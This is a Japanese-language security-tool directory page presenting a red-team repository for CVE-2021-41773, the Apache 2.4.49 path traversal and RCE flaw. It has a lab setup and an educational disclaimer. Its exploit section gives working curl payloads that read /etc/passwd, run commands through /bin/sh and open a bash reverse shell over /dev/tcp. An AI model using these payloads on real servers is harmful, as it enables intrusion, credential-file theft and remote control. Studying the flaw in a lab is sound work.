Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41773-RedTeam — Apache 2.4.49 パストラバーサル RCE | Kitploit
ツール/GitHubGitHub/sobanahmed6061/cve-2021-41773-redteam
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubsobanahmed6061/cve-2021-41773-redteam

CVE-2021-41773-RedTeam

Apache 2.4.49 パストラバーサル RCE

リポジトリを見る
15ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41773 — Apache HTTP Server 2.4.49 パストラバーサル / RCE

ITSOLERAサイバーセキュリティ部門 — レッドチームタスク #3
チーム: Offensive Team Zeta
日付: 2026年3月18日


⚠️ 免責事項

このリポジトリは教育目的専用です。
すべてのテストは隔離されたローカルDockerラボで実施されました。
本番稼働中のシステムや第三者システムに対して使用しないでください。


CVE 概要

項目詳細
CVE IDCVE-2021-41773
CVSS9.8 CRITICAL
影響を受けるバージョンApache HTTP Server 2.4.49 のみ
種別パストラバーサル + リモートコード実行
修正バージョンApache 2.4.51

リポジトリ内容

ファイル説明
poc_41773.pyTeam Zetaバナー付きPython PoCエクスプロイトスクリプト
docker-compose.yml脆弱性のあるラボ環境のセットアップ
offensive_zeta_shell.txtライブセッションログ — エクスプロイトの証拠
screenshots/証拠スクリーンショット
Offensive_Team_Zeta_FINAL_Report.pdf完全なエクスプロイトレポート

ラボのセットアップ

root@kitploit:~
# 脆弱性のあるイメージを取得
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid

# ラボを起動
docker-compose up -d

# Apache 2.4.49が実行中であることを確認
curl -I http://localhost:8080/
# 表示されるべき内容: Server: Apache/2.4.49

エクスプロイト

root@kitploit:~
# パストラバーサルによるファイル読み取り
curl --path-as-is \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

# リモートコード実行
curl --path-as-is \
    -d 'echo Content-Type: text/plain; echo; id' \
    'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

# リバースシェル(IPを自分のマシンのIPに置き換えてください)
curl --path-as-is \
    -d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
    "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

参考文献

  • https://nvd.nist.gov/vuln/detail/CVE-2021-41773
  • https://www.exploit-db.com/exploits/50383
  • https://httpd.apache.org/security/vulnerabilities_24.html
ツールをダウンロード